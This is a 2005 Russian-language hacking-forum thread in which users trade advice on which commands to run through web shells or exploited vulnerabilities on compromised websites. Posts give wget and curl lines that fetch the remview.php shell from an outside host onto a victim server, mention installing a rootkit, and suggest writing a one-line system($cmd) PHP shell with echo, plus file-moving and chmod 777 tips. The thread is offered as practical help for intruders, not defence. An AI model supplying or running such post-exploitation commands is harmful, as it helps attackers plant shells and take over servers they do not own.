Команды.

Discussion in 'Болталка' started by gangster!, 26 Apr 2005.

  1. gangster!

    gangster! New Member

    Joined:
    24 Mar 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
    The document has moved here
     
  2. KEZ

    KEZ Guest

    Reputations:
    0
    Ну тут нужны прямые руки а не банальное знание команд.
    Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
    также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
    и другими прогами...
    /usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
    ещё
    можно использовать echo ))

    проверь, какие утилиты есть в с-ме: which wget
    если все ок, тебе покажут /usr/bin/wget
     
  3. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
    И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?
     
  4. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    ЭЭЭэ погодите это все конечно хорошо но при чем тут Взлом Форумов?
    Переезжаем.
     
  5. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    переехать то переехал, но тему так и не раскрыли =)
     
  6. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
    wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
    tar, gzip - архиваторы
    cp - копирование
    chmod - сменить чмод файла
    mkdir - создать диру
    ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls
     
    _________________________
  7. BNF

    BNF Elder - Старейшина

    Joined:
    16 Apr 2005
    Messages:
    55
    Likes Received:
    1
    Reputations:
    0
    можно ещё такое:

    ** Записать новую инфу в файл:
    echo "my new file content" > file.txt

    ** Дописать в конец файла:
    echo "my add file content" >> file.txt

    ** Ещё есть замечательная команда: man :D Например:
    man lynx ;)

    ** Запуск какой-то утилиты в фоне (на конце знак бэкграунд процесса):
    /usr/bin/some_util &

    ** Полезная команда смены прав:
    chmod 777 file1 file2 file3...
     
  8. Fan

    Fan New Member

    Joined:
    11 Apr 2005
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    не понимаю людей короые заливают шелл из одной строчки (system($cmd)) вгетом... а потом кричат что не работает. echo не судьба юзать?
     
  9. JayTi

    JayTi New Member

    Joined:
    14 Jul 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0